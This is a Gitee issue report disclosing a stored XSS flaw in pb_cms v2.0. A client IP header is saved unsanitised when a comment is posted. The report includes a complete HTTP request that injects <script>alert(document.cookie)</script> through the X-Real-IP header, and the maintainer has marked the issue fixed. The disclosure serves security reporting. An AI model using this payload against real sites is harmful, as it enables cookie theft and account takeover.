133 Star 1.3K Fork 576

LinZhaoguan/pb-cms

 / 详情

A stored XSS vulnerability in pb_cms v2.0 IpUtil.getIpAddr()

已完成
创建于  
2022-04-11 16:42

Post comments on any articles on the front desk and grab bags
输入图片说明
输入图片说明
Add x-real-ip, replay

POST /blog/api/comment/save HTTP/1.1
Host: local:8899
Content-Length: 89
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://local:8899
Referer: http://local:8899/blog/article/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Real-IP: <script>alert(document.cookie)</script>

sid=1&nickname=qwe&qq=1231231231&email=123%40qq.com&content=%3Cp%3E123123%3C%2Fp%3E%0D%0A

Escalation of Privileges
#I4XWJ7:A stored XSS vulnerability in pb_cms v2.0 message board
输入图片说明
输入图片说明

评论 (1)

popko 创建了任务
LinZhaoguan 任务状态待办的 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
996687 linzhaoguan 1578937806
Java
1
https://gitee.com/LinZhaoguan/pb-cms.git
git@gitee.com:LinZhaoguan/pb-cms.git
LinZhaoguan
pb-cms
pb-cms

搜索帮助

A270a887 8829481 3d7a4017 8829481